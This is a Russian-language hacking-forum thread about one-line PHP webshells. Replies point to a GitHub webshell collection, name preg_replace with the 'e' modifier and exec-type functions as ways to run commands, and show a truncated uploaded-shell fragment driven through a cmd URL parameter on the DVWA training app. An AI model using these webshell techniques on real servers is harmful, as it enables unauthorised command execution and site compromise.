ANTICHAT - Однострочный PHP-скрипт для получения Shell-a.

ANTICHAT (https://forum.antichat.xyz/index.php)

- Этичный хакинг или пентестинг (https://forum.antichat.xyz/forumdisplay.php?f=209)

- - Однострочный PHP-скрипт для получения Shell-a. (https://forum.antichat.xyz/showthread.php?t=561925)

nekto

16.03.2018 21:26

Мыслишь в верную сторону, только скрипту этому... боюсь считать годы
Как ты его в интернете не нашел - просто удивительно
Если интереснен PHP + безопасность. Вот подборка PHP шеллов, изучай:

Код:

https://github.com/JohnTroony/php-webshells

centr

01.07.2018 05:34

Более универсальнее preg_replace ещё не видел.
Можно использовать eval\passthru\exec\shell_exec\...., но preg_replace всех победит!

Necr0s

11.07.2019 15:54

&1'); ?>
и потом выполняем команды через cmd
IP/dvwa/hackable/uploads/shell.php?cmd=ls

Citizen0

12.07.2019 11:25

Цитата:

centr сказал(а):

но preg_replace всех победит!

Наверное... Если искать сайты с версией php, поддерживающей модификатор e в указанной функции.

Цитата:

Necr0s сказал(а):

&1'); ?>
и потом выполняем команды через cmd
IP/dvwa/hackable/uploads/shell.php?cmd=ls

И чем этот вариант отличается от предложенного в стартовом посте?
Поменяли e на cmd

Время: 09:48